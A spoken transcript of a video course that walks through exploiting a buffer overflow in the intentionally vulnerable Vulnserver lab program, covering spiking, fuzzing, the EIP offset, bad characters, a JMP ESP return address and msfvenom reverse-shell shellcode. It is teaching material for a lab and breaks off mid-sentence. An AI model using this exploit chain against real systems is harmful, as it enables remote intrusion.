we're talking about, once we have the EIP controlled, we need to do a few house cleanup things. One is called finding bad characters. The other is called finding the right module. This doesn't need to make sense right now. But once we do that, and we have this information from steps 5 and 6, we can generate shellcode, this malicious shellcode that will allow us to get this reverse shell. So we're going to use that. We're going to point that EIP to our malicious shellcode, and hopefully we're going to gain root. So again, this will all make sense as we dive into the future videos and we get hands-on. So if you look at these videos, these are the videos that are going to come. So our next video is going to be on spiking, second one's going to be on fuzzing, and so on. So if you have trouble with one area in particular, you can watch that area specifically and not have to look through a long video and hopefully break this down into little nuggets. All right, everybody, let's get started with spiking. So before we get started, we're going to do a couple of housekeeping things. First, I want you to disable your Windows Defender real-time protection if you have that enabled. So it looks something like this, where you should turn off this button right here. We're doing that because Vuln Server will actually be blocked by Windows Defender if you try to run it and then run anything malicious against it. So good on Windows Defender for picking this up. This is more recent, as I've taught this in the past. It never used to, but now it does. So we're going to make sure that we turn off this real-time protection. And then we're going to make sure that when we run our programs today, our immunity debugger, and we run our Vuln server, that we're running them as administrator. So let's go ahead and first get our Vuln server running. So remember, I told you to extract that to a folder. Here's my Vuln server folder. I'm going to right click on this and I'm just going to run it as administrator. So now that I've got that running, it should look something like this. And we're also going to run immunity as administrator. So we're going to do that because if we don't, it's actually not going to see Vuln server running as administrator and be able to access it. So we need both running as admin. And the other reason is for Vuln server running as admin is when we get the shell on this, we're actually going to end up as root automatically. So we just want this in the most simple terms. So I'm going to bring immunity over here. And now what we're going to do is we're going to go over here to file, and we're going to say attach. And if you scroll down, you'll see Vuln server right here. I'm going to go ahead and just hit attach on that. Okay, in the bottom right corner, you see that it says pause. What we're going to do is just hit start over here, this play button up top. And now it should say running. So if you're running, then we are good to go. So now we're going to dive into our Kali Linux machine. So I'm in a command prompt in Kali Linux. And the first thing I want to do is connect to Vuln server and see what it is. So by default, Vuln server runs on port 9999. And you need to know the IP address of your Windows machine that it's running on. So once you know that, what we can do is use a tool called netcat. We'll use a switch of NV. We're going to do a connection here. And we're just going to say the IP address. So mine is 1.90. And then the port that you're going to connect on, which is 9999. Okay, so you should see the screen that says welcome to vulnerable server. Type help for help. So it's saying help in all caps. We're going to do that, all caps. And then we get this list of valid commands. So it looks like Vuln server takes commands based on what you enter, right? So there's a stats command, rtime, ltime, etc. So the primary command that we're going to be focusing on is this trun command. Now, when I've taught this in the past, I've left out actually how to find this. So I wanted to teach in depth how we're going to find that trun itself is vulnerable. So we're going to do something called spiking. What spiking does is we're going to take this command one at a time. We'll say like stats, and we're going to say, hey, stats, I'm going to throw a bunch of characters at you and see if I can overflow that buffer that we talked about in the previous video. So do we overflow the buffer? Does the program crash? If it does, then we know, hey, stats is vulnerable. If it doesn't, okay, maybe it's not vulnerable. We'll move on to the next one. So I'm going to show you what a non-vulnerable one looks like and what a vulnerable one looks like, and we're going to look at stats and trun for that purpose. So when we spike, we're going to use a tool called generic TCP And it's going to look something like this. Let's go ahead and Control C, or actually we'll just type exit out of this if we can. And then what we're going to do is we're going to use, it's called generic send TCP. Let's type that in real quick. Okay, so here is the usage for this. You're going to need the host. Okay, we know the host of 192.168.1.90. You're going to need the port. We know that. You're going to need a spike script. And then you're going to need these skip variables here, which we're just going to leave at 0. So this is what the usage should look like. But we need this spike script. So let's go ahead and talk about that first. So I've already gone ahead and pre-written it. It's very, very simple. So let's take a look at it in gedit. So first we're going to look at stats. So we're going to have stats.spk for spike. So what we're going to do is we're going to read the line. Then we're going to take a string, and the string is stats. Remember, that's what we had here, the stats command. And then we're just going to send a variable at it. Okay, and then when we spike this, we're going to send variables in all different forms and iterations. So it might send 1,000 at a time, then 20,000 at a time, then 5 at a time. It's just looking for something to break the program. So that's what spiking is. We're going to send all kinds of different characters randomly, essentially, to try to break this part of the program. So now we're getting into specifics here. So if you can imagine, we've got this stats.spike. We're also going to have the trun.spike, and the trun's going to have this trun command here. So if you're following along, make sure that you type this out just how I have it, just these 3 simple lines. Go ahead and save it as stats.spike. And what we're going to do is we're going to send this. So again, we're going to say generic send TCP. And then we know the host is 192.168.1.90. The port is 9999. The spike script is stats.spike. And then we're going to just say 0 space 0. Now we've got immunity running right now over here. If you have multiple screens, you can run it on multiple and kind of watch what happens. If we hit enter here, it's going to just be running through this. This is running. You can see that it's taking commands, but nothing's really happening. We'll let it run through all the way just to make sure. And so you're going to see a little bit of a different action when we do have something vulnerable. So we're going through, looks like we're connecting. If we look at Vuln server, you can see that we're actually connecting to the client here and then disconnecting from the client as we send these commands over. So I'm going to go ahead and just kill this for now. You can hit Control C. Doesn't look like it's vulnerable. In a real test, we'd let it run all the way through, but I'm telling you now it's not vulnerable, so we'll just save a little bit of time. So now let's take a look at the trun spiking. Again, should look the same, but you should have a trun.spike similar to this. So if you want to go ahead and type this out, and we have this trun command here. So when we send this spike, I'm just going to tab up twice and change this to trun. And then again, we have to make sure immunity is running. You see it's running in the corner. We're going to go ahead and hit send on this. And immediately immunity starts blinking. What happened? We have paused over here. There's an access violation when executing. Okay, let's go ahead and just kill the process in Kali because we don't need to keep sending all these. So your Vuln server has actually crashed. You're not seeing an error message because it's being held up by the immunity debugger. If we were to actually detach or unpause this, then Vuln server would crash. So we've hit a violation. This is really good. This says, hey, something's vulnerable here. And if we look at the registers, we can kind of get some information. So one of the informations that we're picking out is, okay, we're seeing this trun command sent, right? And we're sending this trun command with a bunch of A's. So imagine this going into a buffer space, right? Like we talked about before. Okay, we're sending this command, A. In a perfect world, the trun command, or this should all fill into a buffer space, right? All these A's. Well, what's happened here is that it's actually filled over. So if we look at the EBP, remember the base register, right? You see 41414141. That's just hex code for 4 A's. So we've got these here, these 4 bytes, right? And we've gone actually over the ESP as well, a bunch of A's here. Okay, and we've gone over the EIP. So now we've overridden everything. Remember when we talked about in the last video, the EIP is the important factor. If we can control this EIP, we can get malicious and point it to something malicious, right? So that's what we're going to do in the next couple of videos. So I've showed you how Trun itself can be spiked and found. In the next video, what we're going to actually be covering is how to fuzz the Trun command with a Python script. So that way you can kind of feel out how this process is done in another way called fuzzing. So it's going to be very, very similar where we send a bunch of A's, and it might feel like a little bit of a repeat lesson, but we're going to build out a Python script to do that. And then once we do that, we're going to work on finding this EIP location, because once we control that, again, we can inject malicious code. So step 1 done. I will see you in the next video for fuzzing. All right, everybody. So in this video, we're going to be covering fuzzing. Fuzzing is very similar to spiking in the sense that we're going to be sending a bunch of characters at a specific command and trying to break it. The difference is with spiking, we're trying to do that to multiple commands to try to find what's vulnerable. Now that we know the Trun command is vulnerable, we're going to go ahead and attack that command specifically. So a couple housekeeping items. We're going to go ahead and boot up Immunity Debugger again. So we're going to administrator. And we're also going to run Vuln Server as administrator. So from here on out, you can assume that Vuln Server is going to be running and Immunity is going to be running, and then we're going to have it attached. So let's go ahead and show that process one more time. And anytime that you do crash Vuln Server, we're going to go ahead and restart it and restart Immunity as administrator and reattach. So there are issues sometimes where if you crash Vuln Server and then you try to reload it with Immunity already open, it causes issues. So it's best to just close out of Immunity as well, reopen Immunity, and start it again. So let's go ahead and make sure everything's running. It is in the corner. Okay, so let's go to our Kali machine now that we have this out of the way. And I've built out a script in Python that we're going to use to fuzz. Let's go ahead and take a look at that script. So we're going to say gedit. I called this one.py. You could do that as well. And if you want to pause the video now and write this out, copy this down, that's fine. You could also do it while I'm talking if you want to save some time. So I'm just going to go line by line and kind of talk about this code, and then we'll see what it does. So from the top, we're just declaring that it's Python. We're going to import a few modules here. We're going to import sys and socket. That way that we can call out the specific IP and port. We're also going to import sleep. That way we can sleep it for a second before trying this process over again. So with those imports out of the way, what we're really focused on is we're declaring a buffer variable here, right? So this variable is called buffer, and inside buffer, we have 100A. So we've got this A times 100. So what we're going to do is we're going to say, while true, so we're going to loop this, right? We're going to say, while true, I want you to try something. What we're going to try is we're going to try to connect to this socket. And the socket, all that is this AFI net, that's your IPv4, and the sock stream, that's your port. So we're going to say, hey, let's connect to this IP address. Remember, this is my IP address for my Windows machine that's running Vuln Server. So we're going to connect to this IP address. We're going to connect to this port. And then once we do that, we're going to send over a Trun command. Remember, we spiked the Trun command, found it was vulnerable. And when we spiked it, when we looked at the registers, we actually saw this little bit of extra information here. So we've got this little command that goes after the Trun that needs to go in there in order for the program to actually understand it. So that's why this has been added here. So we say, hey, send over this message, send over Trun, and then also send over the buffer. So send Trun with 100 A's. Okay, then close that connection, go to sleep for a second, and then we're going to append to buffer another 100 A's. So what we're going to keep doing is, as long as there's a connection here, we're going to keep sending you buffers. And it's going to get bigger and bigger. So next time we're going to send 200, then we're going to send 300, 400, etc. until this thing breaks. So what we're trying to do is we're trying to really narrow down where it's breaking and at what specific byte size. So what we're doing here is we're going to fuzz it. And then once it breaks, it should print out an exception that says, okay, fuzzing's crashed at X bytes, right? So let's go ahead and see what that's going to look like. So go ahead and save this file if you haven't already. One other important thing we need to do is we need to change the mode on this to execute. So we'll say change mode +x 1.py. That way we can execute this. And just again to confirm, we've got immunity running. So let's go ahead now and say 1.py. Hit enter. And you should see the connections coming through here on Vuln server. So every time it's doing this, it's sending a new 100 bytes. We can watch immunity for the crash. The crash should happen pretty quick. And then once it does, you can kill the program because sometimes it doesn't kill itself. So it's not the best. There we go. We paused it. No more connections. So let's go ahead, go into Kali, hit Control-C, and we crashed somewhere around 2,700 bytes, give or take. Okay, so let's look at the crash. So again, we see the crash came through, and we've got a bunch of A's sitting here. We didn't look like we actually overwrote the EIP. That's fine. We just need to know approximately where we crashed at. So we'll just call it, for even round numbers, that we crashed somewhere around 3,000 bytes. So what we're going to be doing in the next video is we're actually going to be finding where the EIP is at. So how we're going to do that is we're going to use a tool that's going to create these random, not really random, there's cyclical values that we're going to send out. And then we're going to say, okay, what is the EIP value and where does it correspond in the specific number of bytes that we sent over? So remember, controlling this EIP value, let's go back to it. Controlling this EIP value is what's the most important. Once we can control this EIP value, we do a little bit of housekeeping in our exploit development process, and then we point this guy to our malicious code and we get root. So we want this EIP, we want to control it, and in the next couple of videos, we're going to learn how to do just that. So I will catch you over in the next video when we cover finding the offset. So when we talk about finding the offset, we kind of talked about in the last video, we're going to be looking for where we overwrite the EIP because that's what we want to control. Now, lucky for us, there is a tool already out there that will help us do this. And this tool is provided by Metasploit Framework. It's called Pattern Create. So in our Kali machine, we're going to go ahead and just get that set up. So what we're going to do is we're going to say user share Metasploit Framework tools exploit pattern create. Okay, now we're going to have to give this a couple switches. Actually, just one for the first one. We're going to give it a switch of L for length. And the switch of L, we're going to say 3,000. So why 3,000? Well, if you remember the last video, what happened was we found somewhere around 2,700 bytes is where the Vuln server program crashed. And then I said, hey, let's just make it an even 3,000. It'll be nice. This is where it comes into play. So we're going to take 3,000 bytes and we're going to hit enter here. What's going to happen is it's going to generate this crazy cyclical code here that we're going to actually have to send into Immunity and Vuln server. So you see all this jumbled stuff. All we're going to do is just take it and we're going to copy it. And then we're going to modify our script that we created earlier just a little bit. And I've gone ahead and done that. I'm going to show you what that looks like. So let's go ahead. I called it 2.py. If you want to modify your 1.py and make it easier from the last video. And then I did a little test here just to make sure it worked. But what we're going to do is we're going to paste this value into here. But first I want to cover this script. So remove some things, remove the time because we don't need it. We still have the import sys and socket. We don't need like a while loop anymore. We can just say try. And we're going to do the same connection, just try in the connection, make sure we connect to that address. And then we're going to send this offset, right? So I'm going to go ahead and paste that value into here. You can go ahead and work on getting this set up. What we're going to do is we're going to send this value and then we're going to close the connection. If for some reason we cannot access it, then we'll throw an exception and say error connecting to server, and then we'll exit out. So what we're going to do is when we send this in, we're going to get a value on the EIP. So we're going to see that the program crashes, and then the value on the EIP is going to come back. And then we're going to use a tool, and we're going to say, hey, okay, Metasploit, I found this value on the EIP. What is the offset? So we've got this pattern create right now, and then we're going to have pattern offset here in a second. So let's go ahead and get this saved up. Once you're ready, go ahead, hit save. Same thing again, what we're going to need to do is we're going to need to change the mode like we did last time to execute on 2.py. And also we're going to need to get immunity running and vuln server running. So I'm going to do that really quick here. Okay, it should look like this. Hit play, make sure we're running in the bottom, and then go ahead and fire off that script. Okay, should throw an exception right away. And you see now that we have this trun command that came through with our values that we sent, right? You see this cyclical value goes to the A's. It crosses over the EBP, down the EIP, even comes through the ESP, right? So what we're doing here is we have completely overwritten everything. We've gone too far because we've crossed this ESP, but really what we're interested in is this EIP. We want to be able to control this value. So we see this value in here is 386F4337 right here. This is what we need and are interested in. So let's see how we can make this value of use. So if we come back to this screen, and let's just tab up a couple, and we'll go here and just backspace. What we're going to say is instead of pattern create, all we're going to say is pattern offset. We're going to give it the same switch of L, and we're going to say 3000. But one thing we need to add in here is a switch of Q, and that's for our finding. So our finding was 386 F as in Foxtrot 4337. And now if we hit enter here and we did it right, we should find a pattern offset, meaning that somewhere inside of these 3000 bytes, it found this pattern and it relayed back to it. So if you see here, we actually do have an exact offset match at 2003 bytes. This information is critical because that tells us now that at 2003 bytes, we can control the EIP. And that's exactly what we're going to do in the next video. We're going to look at the EIP and see if we can control it. So we're going to try to overwrite it with very specific bytes and see if those bytes show up. So let's go ahead and move on to there. Okay, so now we're going to try to overwrite the EIP. So in the last video, we discovered that the offset was at 2003 bytes. What that means is there's 2003 bytes right before you get to the EIP, and then the EIP itself is 4 bytes long. So what we're going to try to do is overwrite those 4 specific bytes. So as always, go ahead and get your immunity debugger running with vuln server attached. When you have that, let's go ahead and hop right into Kali Linux. This should be a pretty short video. So what we're going to do is let's go ahead and just gedit the last script that we wrote, which was 2.py. And we're going to modify this together. So what we can do here is we can just delete this offset variable because we don't need that anymore. And instead, we can just write shellcode here. And we'll switch out this offset variable to shellcode. And then let's go ahead and set this equal to A times 2003 plus B times 4. So let's make sense of this real quick. We're replacing what we sent before to find the offset with the shellcode. Now the shellcode's nothing but A's and B's right now, but it's going to get malicious in a minute. So what we're doing here is we're sending 2003 A's. Why? Because that's where the EIP starts. So byte 2004 starts the EIP. So what we're doing is we're sending a bunch of A's, but we want to make sure that we don't overwrite the EIP with A's and have no idea if we're correct or not. So remember, A's are 4 1s, B's is going to then be 4 2. So in theory, we should see 4 2, 4 2, 4 2, 4 2 on the EIP when we overwrite it. So let's go ahead and just fire this guy off. I'm going to save this, and you could save it as .3 if you want. I'm just going to keep it .2 to make it simple. And then what we're going to do is 2.py. Remember, if you did make it a new file, go ahead and change the mode. And since we have Vuln server running and attached to Immunity Debugger, we should just be able to fire this guy off. And it should break the program. So we have pause down here, access violation, great. Okay, so let's talk about what happened here. So you see the EAX, Trun ran through, bunch of A's, we're used to seeing that. EBP, 41414141, good, came through. But look here, the EIP is 42424242. Now we only sent 4 bytes of B's and they all landed on the EIP. Guess what? That means we control this EIP now. So from here, it's pretty smooth sailing. We got a couple of housekeeping things we got to do in terms of finding bad characters and finding the right module to send this to. But once we do that, we're going to generate some shellcode. We're going to point this EIP here instead to that return address that's going to be malicious, and then we're going to gain root. So hopefully this makes sense. Again, just to reiterate, we have controlled the EIP, and now we're going to start to get malicious. So in the next video, we're going to talk about finding bad characters. Okay, so now we're going to talk about finding bad characters. When we talk about finding bad characters, we're talking about this in relation to generating shellcode. When we generate shellcode, we need to know what characters are good for the shellcode and what characters are bad for the shellcode. We can do that by running all the hex characters through our program and seeing if any of them act up. By default, the null byte x00 acts up. So we're going to take a look at what these look like and if any of these bad characters act up in our program. So let's go ahead and actually go out to Internet Explorer or Firefox in Kali. Okay, and in a small update to the course, the link I was going to have you go to, or I did have you go to, no longer exists. So my bad chars now looks a little bit different, but what we're going to do is we're going to go to the first one here, which is the Cytopia. It is actually a bad char generator. It's a tool. You're welcome to download it and set it up. Fairly easy to install with pip if you want. It shows you all the usages, pretty nice and neat. The cool thing, however, is we can just copy what's already here. So this is in your course resources. All I want you to do is right click, copy this, and then we're going to paste this into a script as the video resumes. But this is in your course resources. Check it out. Great little tool. Otherwise, let's go ahead and continue the video. And then what we're going to do is we're going to go ahead and just gedit the last Python script we worked on. For me, that was 2.py. It could be whatever you named your script. And if you recall, we had just overwritten the EIP with 4B. So we're just going to add on to that. So I'm just going to hit enter twice here and then hit paste. And remember we talked about the null byte, this x00 being bad. I'm going to go ahead and just delete that anyways. So we don't even have to run it through our program. So when we're talking about bad characters, what we do here is we run every single character in hex through it, right? So we got 1, 2, 3, 4, 5, 6, 7, 8, 9, 0A, 0B, 0C, etc., all the way to XFF down here. So some programs have characters, just let's make something up, for example, say X70. It may be some command that runs in the program that tells it to do something, right? So we don't want to use X70 in our generating of shellcode because then the shellcode is going to break if it uses this X70. So what we do is we parse all of these through the program and we see what looks funny. Basically, it's an eye test. So what we're going to do is we're going to go ahead and save this. Actually, we need to add one more thing. I apologize. We're going to add the bad chars here after the EIP, and then we're going to save this. And then again, if you're creating a new file, make sure you change your mode. Of course, make sure that you have your immunity running and you have Vuln server attached. So what we're going to do now is we're going to fire this off. It should break the program. No big deal. Okay, it comes through. We see again, we've got a bunch of 42s here. But what we're really interested in is the hex dump. So we can look at that dump this way. We could say, at the ESP, right click and say follow and dump. Okay, if you look here, let me try to make this bigger. If you want to make it bigger, you can actually go into the text or the appearance, I apologize, and you could say the font to OEM, I believe, is the biggest. Okay, and I will try to pull this up a little bit so it looks bigger here. So what we're going to do then is we're going to look at this hex dump here. And if this is small, I apologize. So what we're doing is we're saying, okay, I sent x01, so we're expecting a 1, 2, 3, 4, 5, 6, 7, 8, 9. Then we expect 0A, 0B, 0C, 0D, 0E, 0F, 10, 11, 12, 13, 14, etc. We go through this whole list, right? Remember, the last thing we sent was FF. So we're looking for FF down here. We go through every single thing and we see if there's anything out of place. Now, heads up, there's nothing out of place here. Vault Server was made to be very easy, very straightforward. So there are no bad characters. But if there were a bad character, it would be out of place. It would not make sense. Like, for example, if you're reading through and you see 10, 11, and then 12 was missing, and then it goes to 13, okay, it's likely that 12 is a bad character. Now, to make more sense of this, I do have bad characters pulled up. Let's take a look at this. So, I've got this dump here instead. So if we look, we've got 01, 02, 03, B0, B0, 06, 07, 08. Okay, so right away, we're missing 4 and 5, right? So we can identify those as bad characters. And what about the rest? So if we keep going through here and we keep looking for these B0s, which is how it's identifying, then we know that those are bad characters. Now, I will say that it's not going to always be B0 that shows up. It's just going to be something that's out of place. And this is definitely an eye test that you're going to have to run through when you do buffer overflows, and you're going to have to make sure you find everything. I have in the past missed one bad character, generated my shellcode, and pulled my hair out for 30 minutes to an hour looking at why it was not working. So if you want to look at this in practice, go ahead. You can pause the video, see if you can identify the rest of the bad characters here. But if not, I'll identify them for you. It's these guys, right? So what you would do is you would write all of these down. You would say, okay, I'm missing 04. I'm missing 05. I'm missing 28 over here. I'm missing 29, missing 44, 45, etc., right? So you want to make sure you notate all of these down, because when we generate shellcode in a couple of videos, you're going to have to remember all of these. But again, lucky for us, the only thing we're going to have to take out when we generate shellcode is that null byte, which we took out here, or else we'd see it start with 00. In a second small update to this video, I want to talk about the bad characters here. Now, when I first gave instruction and taught this, my understanding of bad characters was actually incorrect. And as we grow older and learn more, we learn more about some of this stuff. So I'm back with a minor correction here. First of all, the B0 character itself, right here, is okay as a character. Second of all, consecutive bad characters, all you have to worry about is the 4 here. The 5 is actually an okay character. So anytime you have consecutive characters, which we have here, our only bad character is the first character in that sequence, so 44 in this instance. With that being said, I am one that takes caution. I would rather take out 4 and 5 and even B0 and run that and have my shellcode generate. Now, I can understand wanting to understand the technical portion of it and what is right and wrong, and I agree 100%. But your shellcode will still operate if you took out 4 and 5, or if you just took out 4. In some rare exceptions, that might not be the case, but for the most part, and especially in beginner exploit development, that is true. But I did want to add some clarification here. From here, we're going to move on to the next video. Okay, now on to finding the right module. So when we talk about finding the right module, what we're saying is we're looking for a DLL or something similar inside of a program that has no memory protections, meaning no dep, no ASLR, no safe SEH, etc. Now there's a tool out there called Mona Modules that we can use with Immunity Debugger to achieve this. So if you go out to Google and you search Mona Modules, you should be able to find a GitHub page for it. You're going to need to download this mona.py file, and put it in this specific folder here. So the specific folder is this PC, program files x86, Immunity Inc., Immunity Debugger, Pi commands, and you're going to paste it right into here. So go ahead and do that, and then once you're ready, let's go back to Immunity Debugger. And now I already have the program attached, Vuln servers here, and what we're going to do is we're going to actually type in this little bar down here. So what you can type in is exclamation Mona modules and hit enter. So that'll pop this guy up here. And if you look, what we can see is these protection settings right here. Look, we've got false, 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 false across the board for some of these protection settings. And that's what is ideal for us, right? We've got trues on some of these other things, but really what we're looking for is we're looking for something attached to Vuln server itself, which you can see this Vuln server right here, and we're looking for all falses. So a prime candidate immediately right away is this essfunc.dll. So we're going to go ahead and just keep that in the back of our minds because we actually need to do one other thing. Now, if we know this by memory, we can go ahead and type it out right here, but I want to show you the process for actually finding what we're about to do. What we're about to do is find the opcode equivalent of a jump. So let's go ahead and look at how to do that. To do that, we're going to go into Kali Linux, and we're going to locate something called NASM shell. So we'll just type locate NASM shell, and go ahead and just copy this Ruby right here, and then paste it in like this and hit enter. So when we say we're looking for the opcode equivalent, we're trying to convert assembly language into hex code. So what I'm doing is I'm going to type in this assembly language, this JMP ESP. This is a jump command. So what we're going to do is we're going to use this as a pointer. So the pointer is going to jump to our malicious shellcode, and that'll make more sense here in just a little bit. So the hex code equivalent of JMP ESP is FFE4. Okay, so now what we're going to do is we're going to take this information, this FFE4, and we're going to go back into Immunity. And we're going to type this instead. So let's delete the modules part. We're going to keep Mona. And we're going to say Mona find. And we'll do a -s. And we're going to say xff/xe4. And then we're going to say M for module. And we're going to use this essfunc.dll. So if that makes sense, we've got our opcode equivalent here, the FFE4. And then we've got the module of essfunc.dll, which is right here. Again, we chose this because it goes with the Vuln server program and it has no memory protections. So this is a good candidate for what we want to do. So let's go ahead and just hit enter on this guy. Okay, and I think I forgot a slash here. Let's check this out. Okay, so that is better. So what we're looking for here is we're looking for these return addresses. So if you look at this 625011AF, that is going to be a return address. So let's go ahead and just write this one down. We're going to go right down the list and find what works. So I always like to start at the top, and you can see here that it found this essfunc.dll, and it's got all the memory protections here listed as false. So now with this information, what we're going to do is we're going to go into Kali. We're going to just type exit here on this NASM shell. And we need to edit our Python script. So whatever Python script you're at, I'm still on 2.py, go ahead and open that guy up. Let's delete out the bad characters because we did already find those. And now what we're going to do is we're going to delete out this B4. So let's write in real quick what our return address was. Remember, it was 625011AF. So now, instead of having 4 B's in place of the EIP, we're going to put this pointer there. So we're going to have the EIP be a jump code, and then the jump code is going to go to malicious code. So we're going to enter that in here. Now we're going to enter it in a little special. So what we're going to do is we're actually going to enter it in like this. We're going to say /xaf/x11 AF50/X62. If you notice, this is actually in reverse. So you see AF115062. We're doing this reverse for a special reason. So when we're talking with x86 architecture, we're doing something called little endian format. So x86 architecture actually stores the low order byte at the lowest address and the high order byte at the highest address. So we actually have to put this in reverse order. So what this should do now is this should throw the same error before, but it's going to hit a jump point. So we can do something special in Immunity to actually catch this. Let's go ahead and hit save on this script. And let's open up Immunity again. So let's go ahead and minimize this. And let's maximize this guy again. Okay, so we're going to do something special here. So first what we're going to need to do is we're going to need to click on this little arrow here. It's kind of bluish black. And we're going to enter in this expression to follow, 625011AF. So remember, that's going to be our jump code. So if we hit OK, we should find this FFE4, this JMP ESP, right? And this is perfect. This is exactly what we want right here. So what we're going to do is we're going to hit F2. So F2 will turn it blue. And what we have just done is we've set a breakpoint. So we have the breakpoint running. What this means is we're going to overflow the buffer, but if we hit this specific spot, this jump code, it's not going to jump to further instruction. It's actually going to break the program and pause right here for further instruction from us. And that's all we want. We don't have anywhere to jump to right now, so it's not important. We just need to know that we are hitting this, we're overwriting the EIP in the exact spot we need to, and then we're going to be able to jump forward. So let's go ahead and hit play here. And then what we're going to do is we're going to go back into Kali and we're going to execute our script. So let's go ahead and do that. We'll say 2.py here. Run that. Oh, you know what I did? Apologize here. I never deleted the original code here. So if you caught that, good job. Okay, let's go ahead and try that now. Okay, so we ran it. And what happened? You see breakpoint at ESSFunc.625011AF happened. The program is now paused. We have hit our breakpoint. That means we control this EIP. Look at this, 625011AF. We control the EIP. Now all we have to do is generate some shellcode, point directly to that shellcode, and we are home free with root. So we're going to go ahead and do that in the next video, and I will catch you over there. All right, the video you have been waiting for. This is the last and final video in the course, and now we're going to gain shell. So here's what's going to happen. We're going to use a tool called MSF Venom, and we're going to use that to generate shellcode. So I'm going to go ahead and copy and paste the command over, and then we'll talk about what this command does. So we're running MSF Venom. It's brought to you by Metasploit, and we're going to set a switch of P for payload. So we're going to set the payload for Windows because we're attacking a Windows machine, and we're going to do a shell reverse TCP. So we didn't declare x64 here, so we're going to assume x86, but we'll declare that later just in case. So when we have a reverse shell like this, what we're doing is we're having the victim connect back to us. So we need to provide our information. So by our information, I mean the Kali machine IP address, which is going to be our L host right here. And then we're going to also have a port we're going to be listening on. So that's going to be our L port, our listening port. And we're going to declare that as 4444. I'm setting an exit func equal to thread. All that does is make our exploit a little bit more stable. We have a -F for file type. We're going to export this into C. A -A for architecture, that's x86. And then a -B for bad characters. Here's where finding the bad characters becomes important. So we didn't have any besides the null byte, but it's always good to teach it and explain why it would be important later. So if we had any bad characters, this is where we would put them in. So let's go ahead and just hit enter here. And it'll take just a second to generate this shellcode. And once it does, we're going to copy and paste it into our Python script that we've been using. So we're going to grab this information here. We don't need the semicolon. And it's always good to take note of the payload size. So it's not going to matter too much for us, but if you do go into exploit development, payload size can be everything. It could be that you're working with a very limited space. Say you only have 200 bytes left, and a payload size of 351 is just not going to work because you're going to truncate it at 200. So always good to note the payload size, especially as you dive deeper into other projects if you do go farther into exploit development. So let's go ahead now and open up our Python script we've been using. So I'm still on 2.py. And I'm going to declare a new variable here up at the top. We're just going to call this overflow. Set it equal to this. I'm going to add a parenthesis, hit enter, and then add a closing parenthesis like that. So what we're also going to do is we're going to come down here and we're going to add in overflow, and then we're going to talk about this. So what we've got here is we've got the shellcode, right? So what's going to happen is we're going to submit the shellcode. In this variable shellcode here, we're going to say, okay, 2003 bytes. That gets us to the EIP. When we get to the EIP, we're going to hit this pointer address, right? This pointer address is just a jump address. So we're going to jump to this set of instructions that we provide. The set of instructions we're providing is this overflow here. So what we need to do before we submit this overflow is actually insert something else. And those are called NOPs. So it's going to look something like this. So it's called X90 like this. And we're just going to add 32 in. And so NOPs are padding, essentially. They stand for no operation. If you've ever heard of something called a NOP sled, that's kind of what it's referring to. So when we have something like this, what we're doing is we're just adding a little bit of pad space in between this jump command and this overflow shellcode, right? So in an instance, if we didn't have this, it's possible that our overflow wouldn't actually work. We wouldn't get command execution on the computer because something interfered here. So we just like to add a little bit of padding in between these two, and that makes it a little bit more safe. Again, if you have a limited space, say we go back to the 200 byte example, you might really need a little bit of padding, like 8 bytes, 16 bytes. You have to play around with it and figure it out. So a lot of exploit development is just messing around with the exploit until something works. So we're going to go ahead and just save this now. Okay, and then on another tab over here, what we're going to do is I'm going to set up netcat to listen. So it's going to be NVLP like this. And then I'm going to put the port to all fours because that's what we declared in our shellcode generation. Okay, lastly, what we need to do is we need to run Vuln server as administrator. We don't have to have it in immunity this time. All we have to do is just make sure it's running. And then we're going to fire off this guy. So we're going to say 2.py, hit enter, check this over here, and look at that, we've got a shell. So now we are on this computer. We could say, who am I? Okay, it's Heath. Heath is me. That's the administrator. Perfect. We are good to go. So we have gone from fuzzing a program, spiking a program, not knowing anything about the program, finding the vulnerable trun command. We used that to fuzz it. We found and controlled the EIP. We found some bad characters. We found the right module, generated some shellcode, and now here we are at root. So hopefully this has been easy for you. My recommendation is to go through and make notes again, try to understand the theory behind what's happening, and also try to understand everything that's going on. This is as basic and simple as overflow can get. Of course, there are memory protections. It's not generally this easy. This is just meant to teach people how buffer overflows work. Hello, everyone. So this is a update to the course. It is 2021 and Python 2 is now very much deprecated. So I showed you some tips and tricks and techniques to run Python 2, and it really was all manual method for utilizing Immunity Debugger. And I think the manual method's good so you understand why you're doing what you're doing and how you can go through it. Now I'm going to show you some automated steps that we can use using Mona, and I'm going to show you how to build out our script in Python 3. Now I'm going to semi-speed run through this because you should have most of this already. So I'm going to walk through and talk what is different in Python 3 and what you see and what might look a little bit different. Okay, so the first thing that we're going to do is we're looking at our initial fuzzing script here. And you can see I'm calling out up here user bin python 3. as opposed to our user bin Python that we initially called. And we're coming through and everything holds true for the most part, except when you come down, we have a couple of differences. So I am putting in a payload of this trun command, right? And we have the buffer that we're sending through. This should look familiar. This is what we did, except we did this in the send command here. All we're doing now is we are encoding this. Now, this might run on its own, although we've seen some issues with Python 3, especially without encoding it, where this will not run. So now we're doing byte encoding, and I'll show you what that looks like here in just a minute when we get to our last script, what it looks like kind of manually, and how you can get this to execute. But for here, we're doing byte encoding, and this is allowing this to send. It's a feature of Python 3. We have to declare what we're sending over in the data. So we're sending over these bytes. Okay, so very, very small differences here. The declaration of Python 3 at the top. Everything else holds true, except we're adding this payload command and we're using a .encode to send this over. Other than that, the print command down here, you'll notice prints now have parentheses. Python 3 feature. We don't just do print and then you're used to seeing just the quotes. Python 3 now, you have to utilize the parentheses around a print. So we're doing that. Okay, so simple, straightforward on this script. If you need it, go ahead, pause on any of these and copy it down if you want to try this out. I'm going to move on to the second part here. So when we're trying to find the offset, same exact thing. Notice all I did was delete the buffer. This looks exactly like the second script that we ran in the initial videos, right? But this time, all I'm doing is removing that while loop, bringing this over. This is identical to the script we created. And again, the print command is now in parentheses. There's offsets here and it's just encoded. Nothing different. We generate this the same exact way. And then we find the offset in the same exact way using our tool set. Okay, so we generate this, go in there, see the offset. The offset will be exactly the same. We'll find that it's 2003. And we'll move on to our next script, where we try to control the EIP. So again, make sure you're using Python 3 at the top. Just small minor changes here. So now with Python 3 at the top again, our third script, we're gonna go ahead and take this, make it into shellcode. This should look no different again. And now we're just gonna replace that with the shellcode variable. Same thing, this is even identical. These last two scripts here, purely identical. All we have to do is change offset into shellcode now that we have found that the offset's at 2003, and we're trying to overwrite the EIP with the 4 bytes. So easy breezy. Moving on, this is where we get into a little bit of fun. Okay, so I showed you how to go out and grab bad characters lists, and we did the manual method where we reviewed everything, and gosh, that took a long time. What we can do here is we have the bad 